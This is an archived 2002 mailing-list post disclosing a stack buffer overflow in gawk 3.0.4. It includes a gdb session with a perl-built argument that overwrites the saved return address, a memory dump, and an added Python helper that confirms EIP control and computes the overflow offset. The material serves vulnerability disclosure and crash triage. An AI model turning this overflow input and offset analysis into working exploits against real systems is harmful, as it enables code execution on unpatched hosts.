Vulnerability Development mailing list archives

RE: Buffer overflow in awk


From: "dong-h0un U" <xploit () hackermail com>
Date: Sat, 16 Mar 2002 05:20:18 +0800


 This puts the last 'NULL byte' and changes the rule of the program.
 The Pico editor or snmpd was exploited by a similar method.

 [x82@xpl017elz x82]$ gdb -q awk
 (no debugging symbols found)...
 (gdb) r -f `perl -e 'print "\x82" x 8173'; printf "\xb0\xba\x82\x82"`
 Starting program: /bin/awk -f `perl -e 'print "\x82" x 8173'; printf "\xb0\xba\x82\x82"`
 
 Program received signal SIGSEGV, Segmentation fault.
 0x8282bab0 in ?? ()
 (gdb) q
 The program is running.  Exit anyway? (y or n) y   
 [x82@xpl017elz x82]$ rpm -qa | grep awk
 gawk-3.0.4-1
 [x82@xpl017elz x82]$

 debugging: 

 (gdb)
 ...
 0xbfffd2b0:     0x82828282      0x82828282      0x82828282      0x82828282
 0xbfffd2c0:     0x82828282      0x82828282      0x82828282      0x82828282
 0xbfffd2d0:     0x82828282      0x82828282      0x82828282      0x82828282
 0xbfffd2e0:     0x82828282      0x82828282      0x82828282      0x82828282
 0xbfffd2f0:     0x82828282      0x82828282      0x82828282      0x82828282
 0xbfffd300:     0x82828282      0x8282bab0      0xbfffd300      0x080538cc
                                                         ~~ <- it's
 0xbfffd310:     0xbfffdd46      0xbfffd390      0x080577e6      0xbfffdd46
 0xbfffd320:     0xfffffffa      0x00000000      0x00000000      0x00000000
 (gdb) x 0xbfffd304
 0xbfffd304:     0x8282bab0
 (gdb)

 fun! 
 Sorry, I do not speak English. :-X

 --
 by "you dong-hun"(Xpl017Elz), <szoahc () hotmail com>. 
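Added crash-triage example (not part of the post or of gawk): given the argument bytes and the gdb memory dump shown above, it confirms that the faulting EIP is the little-endian value of the last four input bytes and locates the stack slot that held the saved return address. The dump lines and the 8173-byte length are taken from the post; the helper names are my own.

```python
import re
import struct

# Sample input reconstructed from the post: 8173 x 0x82 followed by b0 ba 82 82.
PAYLOAD = b"\x82" * 8173 + b"\xb0\xba\x82\x82"
# EIP reported by gdb in "Program received signal SIGSEGV".
FAULT_EIP = 0x8282bab0
# Three lines of the stack dump copied from the post.
GDB_DUMP = """\
0xbfffd2f0:     0x82828282      0x82828282      0x82828282      0x82828282
0xbfffd300:     0x82828282      0x8282bab0      0xbfffd300      0x080538cc
0xbfffd310:     0xbfffdd46      0xbfffd390      0x080577e6      0xbfffdd46
"""

# One gdb "x/4x" style line: address, colon, then 32-bit hex words.
LINE_RE = re.compile(r"^(0x[0-9a-f]+):[ \t]+((?:0x[0-9a-f]{8}[ \t]*)+)$", re.M)


def parse_gdb_words(dump):
    """Turn gdb memory-dump text into a list of (address, value) pairs."""
    words = []
    for m in LINE_RE.finditer(dump):
        base = int(m.group(1), 16)
        for i, w in enumerate(m.group(2).split()):
            words.append((base + 4 * i, int(w, 16)))
    return words


def find_overwritten_return(words, fill_word, eip):
    """Address of the first non-fill word whose value equals the crash EIP."""
    for addr, val in words:
        if val != fill_word and val == eip:
            return addr
    return None


def tail_as_little_endian_u32(payload):
    """Interpret the last four input bytes as x86 (little-endian) would."""
    return struct.unpack("<I", payload[-4:])[0]


def triage(payload, dump, eip):
    """Summarise whether the input controls EIP and where the saved EIP sat."""
    return {
        "input_controls_eip": tail_as_little_endian_u32(payload) == eip,
        "saved_eip_slot": find_overwritten_return(parse_gdb_words(dump), 0x82828282, eip),
        "offset_to_eip": len(payload) - 4,
    }
```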

